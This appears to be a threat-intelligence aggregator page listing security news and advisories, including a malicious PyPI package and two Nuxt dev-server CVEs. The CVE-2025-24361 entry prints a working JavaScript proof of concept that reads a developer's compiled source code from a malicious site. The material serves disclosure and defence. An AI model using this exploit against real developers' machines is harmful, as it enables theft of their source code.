CyberAlerts is shutting down on June 30th, 2025. Thank you for your support!
Threat and Vulnerability Intelligence Database
Example Searches:
CVE
Threat Actors
Countries
Vendors
Severity
Known Exploited
|
Description: McAfee Labs has uncovered a network of malicious GitHub repositories masquerading as game hacks, cracked software, and cryptocurrency tools to distribute the Lumma Stealer malware. The cybercriminals behind these repositories frequently update them with new names and descriptions while maintaining the same malicious payload, ensuring continued infections despite GitHub’s takedown efforts. Pirate software to malware …
The post Fake Game Cheats on GitHub Deliver Lumma Stealer Malware appeared first on CyberInsider.
January 27th, 2025 (5 months ago)
|
|
|
Description: Starting in February 2025, Bitwarden will implement an additional security measure for accounts that do not have two-factor authentication (2FA) enabled. Users logging in from unrecognized devices will be required to verify their identity via an emailed code before accessing their vaults. This change aims to protect against unauthorized access and mitigate the risks of …
The post Bitwarden Adds Email Verification for Unrecognized Logins appeared first on CyberInsider.
January 27th, 2025 (5 months ago)
|
|
|
Description: We thank participants and look forward to sharing what we've learned
January 27th, 2025 (5 months ago)
|
|
|
Description: Whether you're facing growing data demands and increased cyber threats, or simply looking to future-proof your business, it's time to consider the long-term benefits of transitioning to a cloud-first infrastructure.
January 27th, 2025 (5 months ago)
|
|
|
Description: In this special interview episode of the 404 Media Podcast, Sam talks to Alexzandra Kekesi, VP of Brand and Community at Pornhub, about age verification laws and what she's hearing from adult performers.
January 27th, 2025 (5 months ago)
|
|
|
Description: Welcome to your weekly cybersecurity scoop! Ever thought about how the same AI meant to protect our hospitals could also compromise them? This week, we’re breaking down the sophisticated world of AI-driven threats, key updates in regulations, and some urgent vulnerabilities in healthcare tech that need our attention.
As we unpack these complex topics, we'll equip you with sharp insights to
January 27th, 2025 (5 months ago)
|
|
|
January 27th, 2025 (5 months ago)
|
|
|
Description: uniapi version 1.0.7 introduces code that would execute on import of the module and download a script from a remote URL, and would then execute the downloaded script in a thread. The downloaded script would harvest system information and POST the information to another remote URL. This code was found in the PyPI release artifacts and was not present in the public GitHub repository.
References
https://github.com/pypa/advisory-database/tree/main/vulns/uniapi/PYSEC-2025-2.yaml
https://inspector.pypi.io/project/uniapi/1.0.7/packages/0f/40/c6e06c22bbc22ef45f40bf5a7711763fa08fec4d16b4718d86fd60970131/uniapi-1.0.7.tar.gz/uniapi-1.0.7/uniapi/__init__.py#line.11
https://github.com/advisories/GHSA-gvvw-rr8m-fj76
January 27th, 2025 (5 months ago)
|
CVE-2025-24360 |
Description: Summary
Nuxt allows any websites to send any requests to the development server and read the response due to default CORS settings.
Details
While Vite patched the default CORS settings to fix https://github.com/vitejs/vite/security/advisories/GHSA-vg6x-rcgg-rjx6, nuxt uses its own CORS handler by default (https://github.com/nuxt/nuxt/pull/23995).
https://github.com/nuxt/nuxt/blob/7d345c71462d90187fd09c96c7692f306c90def5/packages/vite/src/client.ts#L257-L263
That CORS handler sets Access-Control-Allow-Origin: *.
[!IMPORTANT]If on an affected version, it may be possible to opt-out of the default Nuxt CORS handler by configuring vite.server.cors.
PoC
Start a dev server in any nuxt project using Vite by nuxt dev.
Send a fetch request to http://localhost:3000/_nuxt/app.vue (fetch('http://localhost:3000/_nuxt/app.vue')) from a different origin page.
Impact
Users with the default server.cors option using Vite builder may get the source code stolen by malicious websites
Additional Information
/__nuxt_vite_node__/manifest / /__nuxt_vite_node__/module also seems to have Access-Control-Allow-Origin: *, so it maybe also possible to exploit that handler.
https://github.com/nuxt/nuxt/blob/7d345c71462d90187fd09c96c7692f306c90def5/packages/vite/src/vite-node.ts#L39
Although I didn't find a valid module id.
Note that this handler is probably also vulnerable to DNS rebinding attacks as I didn't find any host header checks.
References
https://github.com/nuxt/nuxt/security/advisories/GHS...
CVSS: MEDIUM (5.3) EPSS Score: 0.04%
January 27th, 2025 (5 months ago)
|
|
CVE-2025-24361 |
Description: Summary
Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.
Details
Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:3000/_nuxt/app.js"> in their site and run the script.
By using Function::toString against the values in window.webpackChunknuxt_app, the attacker can get the source code.
PoC
Create a nuxt project with webpack / rspack builder.
Run npm run dev
Open http://localhost:3000
Run the script below in a web site that has a different origin.
You can see the source code output in the document and the devtools console.
const script = document.createElement('script')
script.src = 'http://localhost:3000/_nuxt/app.js'
script.addEventListener('load', () => {
for (const page in window.webpackChunknuxt_app) {
const moduleList = window.webpackChunknuxt_app[page][1]
console.log(moduleList)
for (const key in moduleList) {
const p = document.createElement('p')
const title = document.createElement('strong')
title.textContent = key
const code = document.createElement('code')
code.textContent = moduleList[key].toString()
p.append(title, ':', document.createElement('br'), code)
document.body.appendChild(p)
}
}
})
document.head.appendChild(script)
It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in t...
CVSS: MEDIUM (5.3) EPSS Score: 0.04%
January 27th, 2025 (5 months ago)
|